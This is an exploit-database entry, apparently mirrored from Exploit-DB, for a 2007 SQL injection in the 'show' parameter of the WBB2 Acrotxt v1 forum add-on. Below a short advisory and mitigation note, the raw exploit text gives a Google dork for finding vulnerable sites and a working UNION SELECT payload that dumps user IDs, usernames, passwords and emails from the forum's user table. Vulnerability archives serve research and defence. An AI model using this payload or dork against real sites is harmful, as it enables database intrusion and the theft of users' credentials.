header-logo
Suggest Exploit
vendor:
WBB2-Addon: Acrotxt v1
by:
D4m14n
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: WBB2-Addon: Acrotxt v1
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

WBB2-Addon: Acrotxt v1 (show) Remote SQL Injection

This vulnerability allows an attacker to perform SQL injection by manipulating the 'show' parameter in the acrotxt.php file. The attacker can execute arbitrary SQL queries and potentially gain unauthorized access to the database.

Mitigation:

To mitigate this vulnerability, the developer should use parameterized queries or prepared statements to sanitize user input and prevent SQL injection attacks. Additionally, input validation and proper error handling should be implemented.
Source

Exploit-DB raw data:

####################################################################
Title: WBB2-Addon: Acrotxt v1 (show) Remote SQL Injection
Bug by: D4m14n [11/07/2007]
Page: www.damians-world.dl.am // www.team-internet.dl.am
Dork: inurl:acrotxt.php wbb
####################################################################

SQL-Injection:
http://[target]/[path]/acrotxt.php?show=[SQL]

Example:
/acrotxt.php?show=-1'/**/UnIoN/**/SElECt/**/null,null,COnCAt(userid,', ',username,', ',password,', ',email),null,null,null,null,null/**/FroM/**/bb1_users/*

####################################################################
#    Doin' this for FUN!
#    GreetZ fly out to Trex, HANN!BAL, Eddy14, Ea$y, Kiba and many more
#
#    PS: I still hate the Black-Music-Scene...
####################################################################

# milw0rm.com [2007-08-27]